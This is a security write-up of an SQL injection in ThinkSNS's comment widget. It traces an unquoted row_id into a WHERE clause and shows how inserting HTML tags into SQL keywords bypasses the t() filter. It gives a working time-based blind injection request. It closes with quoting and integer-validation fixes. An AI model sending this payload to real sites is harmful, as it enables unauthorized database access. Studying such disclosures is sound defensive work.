SQL Injection in ThinkSNS
This is the first vulnerability in the ThinkSNS series: improper handling of some request parameters leads to SQL injection.
The vulnerability is in the Comment widget:
\addons\widget\CommentWidget\CommentWidget.class.php:138

/**
 * Add comment operation
 * @return array Status of the comment addition and prompt information
 */
public function addcomment() {
    // Default value of the returned result set
    $return = array('status' => 0, 'data' => L('PUBLIC_CONCENT_IS_ERROR'));
    // Get received data
    $data = $_POST;
    // Security filter
    foreach ($data as $key => $val) {
        $data[$key] = t($data[$key]);
    }
    // Application and table being commented on
    $data['app']     = $data['app_name'];
    $data['table']   = $data['table_name'];
    $data['content'] = h($data['content']);
    // Determine whether the resource has been deleted
    $dao = M($data['table']);
    $idField = $dao->getPk();
    $map[$idField] = $data['row_id'];
    $sourceInfo = $dao->where($map)->find();
    if (!$sourceInfo) {
        $return['status'] = 0;
        $return['data']   = 'Content deleted, comment failed';
        exit(json_encode($return));
    }
    ..................
    // Add comment operation
    $data['comment_id'] = model('comment')->addComment($data);
    if ($data['comment_id']) {
        $return['status'] = 1;
        $return['data']   = $this->parseComment($data);
        // Synchronize data to weiba
        if ($data['app'] == 'weiba') $this->_upateToweiba($data);
        ...............
    }
}
Every value in $_POST is passed through t() and stored in $data by $data[$key] = t($data[$key]).
After the comment is added, the code decides which application to synchronize it to based on $data['app'], for example:
// Synchronize data to weiba
if ($data['app'] == 'weiba') $this->_upateToweiba($data);
\addons\widget\CommentWidget\CommentWidget.class.php:252:
// Synchronize data to weiba
function _upateToweiba($data) {
    $postDetail = D('weiba_post')->where('feed_id=' . $data['row_id'])->find();
    if (!$postDetail) return false;
    ... ... ... ... ...
}
$data['row_id'] flows into $postDetail = D('weiba_post')->where('feed_id=' . $data['row_id'])->find(), where it is concatenated into the WHERE clause without single quotes.
$data['row_id'] is controlled by the front end (it comes straight from $_POST['row_id']), so SQL injection exists here.
Because the ThinkSNS front end applies t() as a WAF on every POST value, t() has to be bypassed:
\core\OpenSociax\functions.inc.php:630

/**
 * The t function filters tags and outputs clean text without HTML
 * @param  string $text Text content
 * @return string       Processed content
 */
function t($text) {
    $text = nl2br($text);
    $text = real_strip_tags($text);
    $text = addslashes($text);
    $text = trim($text);
    return $text;
}
Every value passing through t() is handed to real_strip_tags($text):
\core\OpenSociax\functions.inc.php:2274

function real_strip_tags($str, $allowable_tags = "") {
    $str = html_entity_decode($str, ENT_QUOTES, 'UTF-8');
    return strip_tags($str, $allowable_tags);
}
The strip_tags($str, $allowable_tags) call inside real_strip_tags() removes tags, so tags inserted into the middle of SQL keywords are simply stripped away and the WAF is bypassed; after that the SQL injection is exploitable.
For time-based blind injection, every POST request must carry the correct Referer header.
POST /index.php?app=widget&mod=Comment&act=addcomment&uid=1

app_name=weiba&table_name=user&content=test&row_id=2 a<a>nd 0=sle<a>ep(2);-- -&app_detail_summary=
Solution:
Add single quotes around SQL query parameters
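As an added example (not ThinkSNS code), the t()/real_strip_tags() chain above is re-created stand-alone to show why tag stripping does not protect an unquoted numeric WHERE clause, and a strict integer check on row_id is shown as the hardened form, going one step beyond the quoting fix; t_filter, unsafe_where, safe_row_id and safe_where are names invented for this demo.

```php
<?php
// Added example, not ThinkSNS code. Re-creates the t()/real_strip_tags() chain
// from the write-up and contrasts the unquoted concatenation in _upateToweiba()
// with a strict integer check. Function names here are invented for this demo.

// Same steps as ThinkSNS's t(), with real_strip_tags() inlined (no allowed tags).
function t_filter(string $text): string {
    $text = nl2br($text);
    $text = html_entity_decode($text, ENT_QUOTES, 'UTF-8');
    $text = strip_tags($text);   // removes tag wrappers, leaving the keyword intact
    $text = addslashes($text);   // only escapes quotes/backslashes; no help for an unquoted number
    return trim($text);
}

// The vulnerable pattern: the filtered value is concatenated without quotes.
function unsafe_where(string $rowId): string {
    return 'feed_id=' . $rowId;
}

// Hardened: accept row_id only if it is a positive integer, before any query is built.
// Returns null otherwise so the caller can refuse the request instead of querying.
function safe_row_id(string $raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Clause built from the validated integer; in ThinkPHP 3 the array form
// where(array('feed_id' => $id)) with this int is the equivalent framework call.
function safe_where(int $id): string {
    return 'feed_id=' . $id;
}

// Constructed inputs: a normal id and the tag-wrapped value quoted in the write-up.
$inputs = ['2', '2 a<a>nd 0=sle<a>ep(2);-- -'];
foreach ($inputs as $raw) {
    $filtered = t_filter($raw);
    echo "raw       : $raw\n";
    echo "after t() : $filtered\n";
    echo "unsafe    : WHERE " . unsafe_where($filtered) . "\n";
    $id = safe_row_id($raw);
    echo "hardened  : " . ($id === null
        ? 'request rejected, row_id is not an integer'
        : 'WHERE ' . safe_where($id)) . "\n\n";
}
```

The second input survives t() with its keywords intact and lands in the unquoted clause unchanged, while the integer check rejects it before any query is built.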